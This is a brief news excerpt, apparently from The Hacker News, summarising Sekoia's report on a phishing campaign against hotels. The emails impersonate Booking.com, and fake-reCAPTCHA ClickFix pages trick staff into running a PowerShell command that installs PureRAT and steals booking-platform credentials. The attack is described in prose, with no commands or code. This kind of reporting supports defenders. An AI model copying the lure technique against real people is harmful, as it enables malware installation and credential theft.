""The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign leverages spear-phishing emails that impersonate Booking.com to redirect victims to malicious websites, employing the ClickFix social engineering tactic to deploy PureRAT." The end goal of the campaign is to steal credentials from compromised systems that grant threat actors unauthorized access to booking platforms like Booking.com or Expedia,"
"In the latest wave analyzed by the French cybersecurity company, emails messages are sent from a compromised email account to target several hotels across multiple countries, tricking recipients into clicking on bogus links that triggers a redirection chain to a ClickFix page with a supposed reCAPTCHA challenge to "ensure the security of your connection." Upon visiting, the URL redirects users to a web page hosting a JavaScript with an asynchronous function that, after a brief delay, checks whether the page was displayed inside an iframe,"
A large phishing campaign targets the hospitality industry by sending spear-phishing emails from compromised accounts impersonating Booking.com. Recipients are lured to ClickFix-style pages that present a faux reCAPTCHA claiming to ensure connection security. The page runs JavaScript that checks for iframes and redirects users to an HTTP URL. Victims are prompted to copy and run a malicious PowerShell command that collects system information and downloads a ZIP archive containing a binary. That binary deploys malware such as PureRAT and establishes persistence. Compromised credentials for platforms like Booking.com and Expedia are stolen for sale or used to send fraudulent booking communications. Activity has been observed since April 2025 and remained active into October 2025 across multiple countries.
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]